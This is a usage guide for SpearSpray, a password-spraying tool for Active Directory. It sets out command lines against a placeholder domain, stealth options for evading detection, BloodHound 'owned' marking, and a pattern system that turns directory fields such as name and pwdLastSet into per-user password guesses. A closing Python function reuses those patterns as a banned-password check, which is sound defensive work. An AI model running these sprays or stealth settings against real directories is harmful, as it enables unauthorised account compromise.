

SpearSpray is a powerful tool for conducting password spraying attacks in Active Directory environments.
This guide covers its Advanced Usage, Stealth Techniques, Neo4j Integration, Attack Results Summary, and the Pattern System.

SpearSpray supports a wide range of arguments to adapt to different scenarios:
Code:
# Domain controllers might require an encrypted connection
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
# Password spraying on a specific group of users
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Add symbols as separators or suffixes to patterns
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep '@' -suf '!'
# Integration with Neo4j/BloodHound to auto-mark compromised users
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound

Sometimes you need to control SpearSpray’s speed in sensitive environments.
Here are stealth options:
Code:
# Reduce number of threads
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5
# Add fixed jitter (N) or random jitter (N,M)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -j 3,5
# Limit requests per second
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --max-rps 10
These options can also be combined for maximum stealth.

SpearSpray integrates with Neo4j (commonly used with BloodHound) to mark compromised accounts.
Features:
- Automatic user marking → Compromised users are flagged as "owned" in Neo4j.
- Real-time feedback → Live updates during spraying.
- Smart duplicate detection → Prevents re-marking same users.
- Comprehensive coverage → Includes accounts with both active and expired passwords.

At the end of each attack, SpearSpray generates a detailed report:
- Valid Credentials → Users with working credentials
- Expired Passwords → Accounts with expired passwords, still counted as compromised
- Marked as Owned → Users flagged in Neo4j
- Total Attempts → Number of logins attempted
- Success Rate → Success percentage vs attempts
This helps red teamers assess impact & effectiveness quickly.

Unlike static wordlists, SpearSpray uses custom patterns per user for targeted spraying.
It generates personalized passwords based on Active Directory data like `pwdLastSet`.
Available Variables:
- {name} → User’s first name (e.g., Eren)
- {samaccountname} → User login (eren.yeager)
- {year} → Year of last password set (2024)
- {short_year} → Last 2 digits of year (24)
- {month_number} → Month in number format (03)
- {month_en} → Month in English (March)
- {month_es} → Month in Spanish (Marzo)
- {season_en} → Season in English (Spring)
- {season_es} → Season in Spanish (Primavera)
- {extra} → Custom keyword (e.g., CompanyName)
- {separator} → Custom separator (e.g., @)
- {suffix} → Custom suffix (e.g., !)
Example Patterns (from patterns.txt)
Code:
# User as password
{samaccountname}
# First name + Year
{name}{separator}{year}{suffix}
# First name + Month + Year
{name}{separator}{month_number}{short_year}{suffix}
# Month name + Year
{month_en}{separator}{year}{suffix}
# Season name + Year
{season_en}{separator}{short_year}{suffix}
# Extra keyword
{extra}{separator}{year}{suffix}
Example: User Eren changed his password in March 2024, with extra = "Paradis", sep = "@", suf = "!"
- {extra}{suffix} → Paradis!
- {name}{separator}{year}{suffix} → Eren@2024!
- {month_en}{separator}{short_year}{suffix} → March@24!
- {season_en}{separator}{year}{suffix} → Spring@2024!
If user Mikasa changed her password in November 2023, the generated passwords differ:
- Mikasa@2023!
- November@23!
- Autumn@2023!
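
From the defender's side, the pattern list above works as a banned-password rule set. The following added example (not part of SpearSpray or the original page) checks a proposed password at change time against those patterns; the function name, the season-by-month mapping and the sample values are assumptions.

```python
import re
from datetime import date

MONTHS_EN = ("January February March April May June July August "
             "September October November December").split()
MONTHS_ES = ("Enero Febrero Marzo Abril Mayo Junio Julio Agosto "
             "Septiembre Octubre Noviembre Diciembre").split()
# Assumption: northern-hemisphere seasons by month, index = (month % 12) // 3.
SEASONS_EN = ["Winter", "Spring", "Summer", "Autumn"]
SEASONS_ES = ["Invierno", "Primavera", "Verano", "Otoño"]


def predictable_reason(password, name, samaccountname, changed_on, extras=()):
    """Return which page pattern `password` matches, or None if it matches none.

    `changed_on` is the date of the password change, i.e. the future pwdLastSet.
    """
    month, season = changed_on.month, (changed_on.month % 12) // 3
    words = {
        "name": name, "samaccountname": samaccountname,
        "month_en": MONTHS_EN[month - 1], "month_es": MONTHS_ES[month - 1],
        "season_en": SEASONS_EN[season], "season_es": SEASONS_ES[season],
    }
    words.update({f"extra:{e}": e for e in extras})
    year = f"{changed_on.year:04d}"
    dates = {"year": year, "short_year": year[2:],
             "month_number+short_year": f"{month:02d}{year[2:]}"}
    # Trailing symbols act as {suffix}; comparison ignores letter case.
    core = re.sub(r"[\W_]+$", "", password).casefold()
    for wlabel, word in words.items():
        w = word.casefold()
        if not w:
            continue
        if core == w:
            return f"{{{wlabel}}} alone"
        if core.startswith(w):
            # One symbol between word and digits acts as {separator}.
            rest = re.sub(r"^[\W_]", "", core[len(w):])
            for dlabel, digits in dates.items():
                if rest == digits:
                    return f"{{{wlabel}}} + {{{dlabel}}}"
    return None


if __name__ == "__main__":
    # Constructed sample: the page's Eren example plus one unrelated passphrase.
    day = date(2024, 3, 15)
    for pw in ["Eren@2024!", "March@24!", "Paradis!", "correct-horse-battery-42"]:
        print(pw, "->", predictable_reason(pw, "Eren", "eren.yeager", day, ["Paradis"]))
```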
